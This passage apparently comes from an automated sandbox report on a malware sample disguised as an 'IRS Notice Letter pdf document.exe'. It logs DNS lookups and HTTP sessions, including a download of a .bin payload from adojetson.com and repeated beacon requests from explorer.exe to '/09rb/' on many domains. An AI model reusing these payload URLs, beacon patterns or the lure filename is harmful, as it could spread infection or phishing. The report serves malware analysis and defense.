Jan 11, 2021 16:22:54.162101984 CET  58028     53        192.168.2.4      8.8.8.8
Jan 11, 2021 16:22:54.219430923 CET  53        58028     8.8.8.8          192.168.2.4
Jan 11, 2021 16:22:55.313086987 CET  53097     53        192.168.2.4      8.8.8.8
Jan 11, 2021 16:22:55.360910892 CET  53        53097     8.8.8.8          192.168.2.4
Jan 11, 2021 16:22:56.570456028 CET  49257     53        192.168.2.4      8.8.8.8
Jan 11, 2021 16:22:56.621493101 CET  53        49257     8.8.8.8          192.168.2.4
Jan 11, 2021 16:22:57.768143892 CET  62389     53        192.168.2.4      8.8.8.8
Jan 11, 2021 16:22:57.827384949 CET  53        62389     8.8.8.8          192.168.2.4
Jan 11, 2021 16:22:59.401148081 CET  49910     53        192.168.2.4      8.8.8.8
Jan 11, 2021 16:22:59.448834896 CET  53        49910     8.8.8.8          192.168.2.4
Jan 11, 2021 16:23:14.129580021 CET  55854     53        192.168.2.4      8.8.8.8
Jan 11, 2021 16:23:14.350569010 CET  53        55854     8.8.8.8          192.168.2.4
Jan 11, 2021 16:23:29.520019054 CET  64549     53        192.168.2.4      8.8.8.8
Jan 11, 2021 16:23:29.568088055 CET  53        64549     8.8.8.8          192.168.2.4
Jan 11, 2021 16:24:06.476883888 CET  63153     53        192.168.2.4      8.8.8.8
Jan 11, 2021 16:24:06.545897961 CET  53        63153     8.8.8.8          192.168.2.4
Jan 11, 2021 16:24:11.567560911 CET  52991     53        192.168.2.4      8.8.8.8
Jan 11, 2021 16:24:11.634740114 CET  53        52991     8.8.8.8          192.168.2.4
Jan 11, 2021 16:24:21.866880894 CET  53700     53        192.168.2.4      8.8.8.8
Jan 11, 2021 16:24:22.008053064 CET  53        53700     8.8.8.8          192.168.2.4
Jan 11, 2021 16:24:27.274300098 CET  51726     53        192.168.2.4      8.8.8.8
Jan 11, 2021 16:24:27.434158087 CET  53        51726     8.8.8.8          192.168.2.4
Jan 11, 2021 16:24:32.450069904 CET  56794     53        192.168.2.4      8.8.8.8
Jan 11, 2021 16:24:32.512212992 CET  53        56794     8.8.8.8          192.168.2.4
Jan 11, 2021 16:24:37.728318930 CET  56534     53        192.168.2.4      8.8.8.8
Jan 11, 2021 16:24:37.877690077 CET  53        56534     8.8.8.8          192.168.2.4
Jan 11, 2021 16:24:42.882637978 CET  56627     53        192.168.2.4      8.8.8.8
Jan 11, 2021 16:24:42.963098049 CET  53        56627     8.8.8.8          192.168.2.4
Jan 11, 2021 16:24:47.984529972 CET  56621     53        192.168.2.4      8.8.8.8
Jan 11, 2021 16:24:48.069564104 CET  53        56621     8.8.8.8          192.168.2.4
Jan 11, 2021 16:24:53.202550888 CET  63116     53        192.168.2.4      8.8.8.8
Jan 11, 2021 16:24:53.279584885 CET  53        63116     8.8.8.8          192.168.2.4
Jan 11, 2021 16:24:58.479343891 CET  64078     53        192.168.2.4      8.8.8.8
Jan 11, 2021 16:24:58.557437897 CET  53        64078     8.8.8.8          192.168.2.4
Jan 11, 2021 16:25:03.605534077 CET  64801     53        192.168.2.4      8.8.8.8
Jan 11, 2021 16:25:03.811801910 CET  53        64801     8.8.8.8          192.168.2.4
Jan 11, 2021 16:25:08.863886118 CET  61721     53        192.168.2.4      8.8.8.8
Jan 11, 2021 16:25:08.938981056 CET  53        61721     8.8.8.8          192.168.2.4
Jan 11, 2021 16:25:13.948646069 CET  51255     53        192.168.2.4      8.8.8.8
Jan 11, 2021 16:25:14.312964916 CET  53        51255     8.8.8.8          192.168.2.4
Jan 11, 2021 16:25:19.726453066 CET  61522     53        192.168.2.4      8.8.8.8
Jan 11, 2021 16:25:20.187546015 CET  53        61522     8.8.8.8          192.168.2.4
Jan 11, 2021 16:25:25.863914013 CET  52337     53        192.168.2.4      8.8.8.8
Jan 11, 2021 16:25:25.938337088 CET  53        52337     8.8.8.8          192.168.2.4
Jan 11, 2021 16:25:31.220172882 CET  55046     53        192.168.2.4      8.8.8.8
Jan 11, 2021 16:25:31.276551008 CET  53        55046     8.8.8.8          192.168.2.4

DNS Queries

Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                          Type            Class
Jan 11, 2021 16:23:14.129580021 CET  192.168.2.4  8.8.8.8  0xd268    Standard query (0)  adojetson.com                 A (IP address)  IN (0x0001)
Jan 11, 2021 16:24:06.476883888 CET  192.168.2.4  8.8.8.8  0xb469    Standard query (0)  www.rappaportcos.com          A (IP address)  IN (0x0001)
Jan 11, 2021 16:24:11.567560911 CET  192.168.2.4  8.8.8.8  0x5723    Standard query (0)  www.emuprising.com            A (IP address)  IN (0x0001)
Jan 11, 2021 16:24:21.866880894 CET  192.168.2.4  8.8.8.8  0x5922    Standard query (0)  www.myaarpdentalpln.com       A (IP address)  IN (0x0001)
Jan 11, 2021 16:24:27.274300098 CET  192.168.2.4  8.8.8.8  0x2045    Standard query (0)  www.stereoslide.com           A (IP address)  IN (0x0001)
Jan 11, 2021 16:24:32.450069904 CET  192.168.2.4  8.8.8.8  0x716d    Standard query (0)  www.alessandrabortolussi.net  A (IP address)  IN (0x0001)
Jan 11, 2021 16:24:37.728318930 CET  192.168.2.4  8.8.8.8  0x53fb    Standard query (0)  www.prendimiconcept.com       A (IP address)  IN (0x0001)
Jan 11, 2021 16:24:42.882637978 CET  192.168.2.4  8.8.8.8  0x27c7    Standard query (0)  www.lobstermenforgolden.com   A (IP address)  IN (0x0001)
Jan 11, 2021 16:24:47.984529972 CET  192.168.2.4  8.8.8.8  0x99e9    Standard query (0)  www.kobumsnetwork.com         A (IP address)  IN (0x0001)
Jan 11, 2021 16:24:53.202550888 CET  192.168.2.4  8.8.8.8  0xeefa    Standard query (0)  www.rednbot.com               A (IP address)  IN (0x0001)
Jan 11, 2021 16:24:58.479343891 CET  192.168.2.4  8.8.8.8  0x9eb0    Standard query (0)  www.austinscubaschool.com     A (IP address)  IN (0x0001)
Jan 11, 2021 16:25:03.605534077 CET  192.168.2.4  8.8.8.8  0x7f82    Standard query (0)  www.wendyallegaert.com        A (IP address)  IN (0x0001)
Jan 11, 2021 16:25:08.863886118 CET  192.168.2.4  8.8.8.8  0xc56e    Standard query (0)  www.virginiadoyle.com         A (IP address)  IN (0x0001)
Jan 11, 2021 16:25:13.948646069 CET  192.168.2.4  8.8.8.8  0xd217    Standard query (0)  www.aksaystudios.com          A (IP address)  IN (0x0001)
Jan 11, 2021 16:25:19.726453066 CET  192.168.2.4  8.8.8.8  0x5cad    Standard query (0)  www.aizimov.com               A (IP address)  IN (0x0001)
Jan 11, 2021 16:25:25.863914013 CET  192.168.2.4  8.8.8.8  0x77f8    Standard query (0)  www.thebuzztraders.com        A (IP address)  IN (0x0001)
Jan 11, 2021 16:25:31.220172882 CET  192.168.2.4  8.8.8.8  0x25b5    Standard query (0)  www.rappaportcos.com          A (IP address)  IN (0x0001)

DNS Answers

Timestamp                            Source IP  Dest IP      Trans ID  Reply Code          Name                          CName                     Address          Type                    Class
Jan 11, 2021 16:23:14.350569010 CET  8.8.8.8    192.168.2.4  0xd268    No error (0)        adojetson.com                 -                         198.187.29.67    A (IP address)          IN (0x0001)
Jan 11, 2021 16:23:14.350569010 CET  8.8.8.8    192.168.2.4  0xd268    No error (0)        adojetson.com                 -                         192.95.36.134    A (IP address)          IN (0x0001)
Jan 11, 2021 16:24:06.545897961 CET  8.8.8.8    192.168.2.4  0xb469    Name error (3)      www.rappaportcos.com          none                      none             A (IP address)          IN (0x0001)
Jan 11, 2021 16:24:11.634740114 CET  8.8.8.8    192.168.2.4  0x5723    No error (0)        www.emuprising.com            emuprising.com            -                CNAME (Canonical name)  IN (0x0001)
Jan 11, 2021 16:24:11.634740114 CET  8.8.8.8    192.168.2.4  0x5723    No error (0)        emuprising.com                -                         34.102.136.180   A (IP address)          IN (0x0001)
Jan 11, 2021 16:24:22.008053064 CET  8.8.8.8    192.168.2.4  0x5922    No error (0)        www.myaarpdentalpln.com       -                         199.59.242.153   A (IP address)          IN (0x0001)
Jan 11, 2021 16:24:27.434158087 CET  8.8.8.8    192.168.2.4  0x2045    No error (0)        www.stereoslide.com           stereoslide.com           -                CNAME (Canonical name)  IN (0x0001)
Jan 11, 2021 16:24:32.512212992 CET  8.8.8.8    192.168.2.4  0x716d    No error (0)        www.alessandrabortolussi.net  alessandrabortolussi.net  -                CNAME (Canonical name)  IN (0x0001)
Jan 11, 2021 16:24:32.512212992 CET  8.8.8.8    192.168.2.4  0x716d    No error (0)        alessandrabortolussi.net      -                         34.102.136.180   A (IP address)          IN (0x0001)
Jan 11, 2021 16:24:37.877690077 CET  8.8.8.8    192.168.2.4  0x53fb    Server failure (2)  www.prendimiconcept.com       none                      none             A (IP address)          IN (0x0001)
Jan 11, 2021 16:24:42.963098049 CET  8.8.8.8    192.168.2.4  0x27c7    Name error (3)      www.lobstermenforgolden.com   none                      none             A (IP address)          IN (0x0001)
Jan 11, 2021 16:24:48.069564104 CET  8.8.8.8    192.168.2.4  0x99e9    No error (0)        www.kobumsnetwork.com         -                         172.67.209.95    A (IP address)          IN (0x0001)
Jan 11, 2021 16:24:48.069564104 CET  8.8.8.8    192.168.2.4  0x99e9    No error (0)        www.kobumsnetwork.com         -                         104.24.111.68    A (IP address)          IN (0x0001)
Jan 11, 2021 16:24:48.069564104 CET  8.8.8.8    192.168.2.4  0x99e9    No error (0)        www.kobumsnetwork.com         -                         104.24.110.68    A (IP address)          IN (0x0001)
Jan 11, 2021 16:24:53.279584885 CET  8.8.8.8    192.168.2.4  0xeefa    No error (0)        www.rednbot.com               rednbot.com               -                CNAME (Canonical name)  IN (0x0001)
Jan 11, 2021 16:24:53.279584885 CET  8.8.8.8    192.168.2.4  0xeefa    No error (0)        rednbot.com                   -                         34.102.136.180   A (IP address)          IN (0x0001)
Jan 11, 2021 16:24:58.557437897 CET  8.8.8.8    192.168.2.4  0x9eb0    Name error (3)      www.austinscubaschool.com     none                      none             A (IP address)          IN (0x0001)
Jan 11, 2021 16:25:08.938981056 CET  8.8.8.8    192.168.2.4  0xc56e    Name error (3)      www.virginiadoyle.com         none                      none             A (IP address)          IN (0x0001)
Jan 11, 2021 16:25:14.312964916 CET  8.8.8.8    192.168.2.4  0xd217    No error (0)        www.aksaystudios.com          -                         147.255.30.94    A (IP address)          IN (0x0001)
                                                                          Jan 11, 2021 16:25:20.187546015 CET8.8.8.8192.168.2.40x5cadNo error (0)www.aizimov.comaizimov.comCNAME (Canonical name)IN (0x0001)
                                                                          Jan 11, 2021 16:25:20.187546015 CET8.8.8.8192.168.2.40x5cadNo error (0)aizimov.com153.126.209.136A (IP address)IN (0x0001)
                                                                          Jan 11, 2021 16:25:25.938337088 CET8.8.8.8192.168.2.40x77f8No error (0)www.thebuzztraders.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)
                                                                          Jan 11, 2021 16:25:25.938337088 CET8.8.8.8192.168.2.40x77f8No error (0)ghs.googlehosted.com216.58.207.179A (IP address)IN (0x0001)
                                                                          Jan 11, 2021 16:25:31.276551008 CET8.8.8.8192.168.2.40x25b5Name error (3)www.rappaportcos.comnonenoneA (IP address)IN (0x0001)

                                                                          HTTP Request Dependency Graph

                                                                          • adojetson.com
                                                                          • www.emuprising.com
                                                                          • www.myaarpdentalpln.com
                                                                          • www.alessandrabortolussi.net
                                                                          • www.kobumsnetwork.com
                                                                          • www.rednbot.com
                                                                          • www.aksaystudios.com
                                                                          • www.aizimov.com
                                                                          • www.thebuzztraders.com

                                                                          HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49730 | 198.187.29.67 | 80 | C:\Users\user\Desktop\IRS Notice Letter pdf document.exe
Timestamp | kBytes transferred | Direction | Data
Jan 11, 2021 16:23:14.564799070 CET | 168 | OUT | GET /vc/xdark_GOaIsqF182.bin HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                          Host: adojetson.com
                                                                          Cache-Control: no-cache
Jan 11, 2021 16:23:14.758521080 CET | 169 | IN | HTTP/1.1 200 OK
                                                                          Date: Mon, 11 Jan 2021 15:23:14 GMT
                                                                          Server: Apache
                                                                          Last-Modified: Thu, 07 Jan 2021 17:20:22 GMT
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 164928
                                                                          Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49732 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 11, 2021 16:24:11.679864883 CET | 354 | OUT | GET /09rb/?Jt78=boggCF0+VtvWGkPjuCU1AaxF3fKHqCWZ16CI7xOuJOi/WrjAR/MJUlDlafE5AdeUJQBT&pN9=EXX8_N6xKpqxS HTTP/1.1
                                                                          Host: www.emuprising.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
Jan 11, 2021 16:24:11.818809986 CET | 355 | IN | HTTP/1.1 403 Forbidden
                                                                          Server: openresty
                                                                          Date: Mon, 11 Jan 2021 15:24:11 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 275
                                                                          ETag: "5fd4972f-113"
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49733 | 199.59.242.153 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 11, 2021 16:24:22.133837938 CET | 357 | OUT | GET /09rb/?Jt78=5Fl0Gne6++jCyaX7Drm8Xn32HTt8H/jqBsF3NSEqn1nDC6nrfbel4dCYEQQYkDcDl2++&pN9=EXX8_N6xKpqxS HTTP/1.1
                                                                          Host: www.myaarpdentalpln.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
Jan 11, 2021 16:24:22.256963968 CET | 358 | IN | HTTP/1.1 200 OK
                                                                          Server: openresty
                                                                          Date: Mon, 11 Jan 2021 15:24:22 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_U5TM9ad0yUw8X7quF8IXqAruBwRglx0Tf2oRLDnMqfZ3M3O+8W2I/3XD5vfWqkj5jHKJswCAl4Tl2M+Uu54Fjw==
                                                                          Data Ascii: ee4<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_U5TM9ad0yUw8X7quF8IXqAruBwRglx0Tf2oRLDnMqfZ3M3O+8W2I/3XD5vfWqkj5jHKJswCAl4Tl2M+Uu54Fjw=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head>...[if IE 6 ]><body class="ie6"><![endif]-->...[if IE 7 ]><body class="ie7"><![endif]-->...[if IE 8 ]><body class="ie8"><![endif]-->...[if IE 9 ]><body class="ie9"><![endif]-->...[if (gt IE 9)|!(IE)]> --><body>...<![endif]--><script type="text/javascript">g_pb=(function(){varDT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.one


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.4 | 49734 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 11, 2021 16:24:32.555069923 CET | 365 | OUT | GET /09rb/?Jt78=kPRwpjmi7xHhdB/QktvvK7WyLyDr49juN0w/BSnfKghxj4qCtVdYSmPoUBccxdfkW2C+&pN9=EXX8_N6xKpqxS HTTP/1.1
                                                                          Host: www.alessandrabortolussi.net
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
Jan 11, 2021 16:24:32.693470001 CET | 366 | IN | HTTP/1.1 403 Forbidden
                                                                          Server: openresty
                                                                          Date: Mon, 11 Jan 2021 15:24:32 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 275
                                                                          ETag: "5fd494f7-113"
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.4 | 49735 | 172.67.209.95 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 11, 2021 16:24:48.117661953 CET | 369 | OUT | GET /09rb/?Jt78=29jYSSE1VYVkBCRV1XAvE7TBMmL4MadGzLcVh0Ks/tFMQ0j4Ha2R4yorJjHtPNwOuGsI&pN9=EXX8_N6xKpqxS HTTP/1.1
                                                                          Host: www.kobumsnetwork.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
Jan 11, 2021 16:24:48.172992945 CET | 369 | IN | HTTP/1.1 301 Moved Permanently
                                                                          Date: Mon, 11 Jan 2021 15:24:48 GMT
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Cache-Control: max-age=3600
                                                                          Expires: Mon, 11 Jan 2021 16:24:48 GMT
                                                                          Location: https://www.kobumsnetwork.com/09rb/?Jt78=29jYSSE1VYVkBCRV1XAvE7TBMmL4MadGzLcVh0Ks/tFMQ0j4Ha2R4yorJjHtPNwOuGsI&pN9=EXX8_N6xKpqxS
                                                                          cf-request-id: 0793a5ce9a00000bf5fd859000000001
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=osL7dKwEvBolDuwOyAAVjWZRbwV1mIhWDQMVxmYU1FMunCTXf9JwcGVACORrPg%2BGmdwjmCHKulm7mSkJbcAjy2PuMNW0Tsx6HPxSk6nKYGm3bOB9lFU%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 60ffa590ff710bf5-AMS
                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.4 | 49736 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 11, 2021 16:24:53.322417021 CET | 370 | OUT | GET /09rb/?Jt78=GzMG1eSemGLMBHrXmbkE5oZCgXo7nbeyHhmTYulGjAFIODDsopduu5ndU/Um1KPjDO6l&pN9=EXX8_N6xKpqxS HTTP/1.1
                                                                          Host: www.rednbot.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
Jan 11, 2021 16:24:53.460947990 CET | 371 | IN | HTTP/1.1 403 Forbidden
                                                                          Server: openresty
                                                                          Date: Mon, 11 Jan 2021 15:24:53 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 275
                                                                          ETag: "5fd4972f-113"
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.4 | 49737 | 147.255.30.94 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 11, 2021 16:25:14.508002996 CET | 373 | OUT | GET /09rb/?Jt78=fd7Pr27tD73tirRUHLPhwKiuhRBsBtIJKGnPU16/EYze1BREDS5LbMsrasNXGEl7bB1Y&pN9=EXX8_N6xKpqxS HTTP/1.1
                                                                          Host: www.aksaystudios.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
Jan 11, 2021 16:25:14.700244904 CET | 373 | IN | HTTP/1.1 200 OK
                                                                          Transfer-Encoding: chunked
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Server: Nginx Microsoft-HTTPAPI/2.0
                                                                          X-Powered-By: Nginx
                                                                          Date: Mon, 11 Jan 2021 15:25:09 GMT
                                                                          Connection: close
                                                                          Data Raw: 33 0d 0a ef bb bf 0d 0a
                                                                          Data Ascii: 3


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.4 | 49738 | 153.126.209.136 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 11, 2021 16:25:20.495930910 CET | 379 | OUT | GET /09rb/?Jt78=nAgyAFuV8j6ec0qd9dJQyz40Go8ypkE1WIwLRMRPEn1ZOiBWoUM4woT6qKfb9Xt5A1xV&pN9=EXX8_N6xKpqxS HTTP/1.1
                                                                          Host: www.aizimov.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
Jan 11, 2021 16:25:20.805578947 CET | 380 | IN | HTTP/1.1 301 Moved Permanently
                                                                          Date: Mon, 11 Jan 2021 15:25:20 GMT
                                                                          Server: Apache
                                                                          Location: http://www.aizimov.com/?Jt78=nAgyAFuV8j6ec0qd9dJQyz40Go8ypkE1WIwLRMRPEn1ZOiBWoUM4woT6qKfb9Xt5A1xV&pN9=EXX8_N6xKpqxS
                                                                          Content-Length: 327
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.aizimov.com/?Jt78=nAgyAFuV8j6ec0qd9dJQyz40Go8ypkE1WIwLRMRPEn1ZOiBWoUM4woT6qKfb9Xt5A1xV&amp;pN9=EXX8_N6xKpqxS">here</a>.</p></body></html>


                                                                          Session ID: 8
                                                                          Source IP: 192.168.2.4
                                                                          Source Port: 49739
                                                                          Destination IP: 216.58.207.179
                                                                          Destination Port: 80
                                                                          Process: C:\Windows\explorer.exe
                                                                          Timestamp: Jan 11, 2021 16:25:25.984777927 CET
                                                                          kBytes transferred: 381
                                                                          Direction: OUT
                                                                          Data: GET /09rb/?Jt78=tK5SHJ/B9VkSEfSQE3soaE4uMhY2LrE6ZvvxVQcBFq9KYH6DfuOZHLVl1n1LVl7A3A7r&pN9=EXX8_N6xKpqxS HTTP/1.1
                                                                          Host: www.thebuzztraders.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Timestamp: Jan 11, 2021 16:25:26.202717066 CET
                                                                          kBytes transferred: 382
                                                                          Direction: IN
                                                                          Data: HTTP/1.1 200 OK
                                                                          Content-Type: text/html; charset=utf-8
                                                                          X-Cloud-Trace-Context: 87cd339222732a8cf9a37e24eab38309;o=1
                                                                          Date: Mon, 11 Jan 2021 15:25:26 GMT
                                                                          Server: Google Frontend
                                                                          Content-Length: 2677
                                                                          Connection: close
                                                                          Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 0a 3c 68 65 61 64 3e 0a 20 20 20 20 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 63 6b 70 61 74 68 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 34 2e 35 2e 32 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 33 38 34 2d 4a 63 4b 62 38 71 33 69 71 4a 36 31 67 4e 56 39 4b 47 62 38 74 68 53 73 4e 6a 70 53 4c 30 6e 38 50 41 52 6e 39 48 75 5a 4f 6e 49 78 4e 30 68 6f 50 2b 56 6d 6d 44 47 4d 4e 35 74 39 55 4a 30 5a 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2e 2f 63 73 73 2f 6d 61 69 6e 2e 63 73 73 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 42 75 7a 7a 20 54 72 61 64 65 72 73 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 20 20 20 20 3c 62 6f 64 79 20 69 64 3d 22 65 6d 61 69 6c 4c 69 73 74 42 6f 64 79 22 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 65 6d 61 69 6c 4c 69 73 74 43 6f 6e 74 61 69 6e 65 72 22 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 31 32 20 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2e 2f 69 6d 67 2f 54 68 65 42 75 7a 7a 54 72 61 64 65 72 73 
2e 70 6e 67 22 20 68 65 69 67 68 74 3d 22 32 33 30 70 78 22 20 77 69 64 74 68 3d 22 32 33 30 70 78 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 22 20 69 64 3d 22 73 6c 6f 67 61 6e 22 3e 49 4e 56 45 53 54 20 49 4e 20 59 4f 55 52 20 54 4f 4d 4f 52 52 4f 57 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 35 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 22 20 69 64 3d 22 70 61 67 65 44 65 73 63 72 69 70 22 3e 53 69 67 6e 20 75 70 20 66 6f 72 20 6f 75 72 20 6e 65 77 73 6c 65 74 74 65 72 3c 2f 68 35 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 66 6f 72 6d 44 69 76 22 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 20 61 63 74 69 6f 6e 3d 22 69 6e 73 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 65 6d 61 69 6c 22 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 31 32 22 20 69 64 3d 22 65 6d 61 69 6c 4c 61 62 65 6c 22 3e 45 6d 61 69 6c 3a 3c 2f 6c 61 62 65 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 65 6d 61 69 6c 22 20 72 65 71 75 69 72 65 64 20 69 64 3d 22 65 6d 61 69 6c 22 20 6e 61 6d 65 3d 22 65 6d 61 69 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
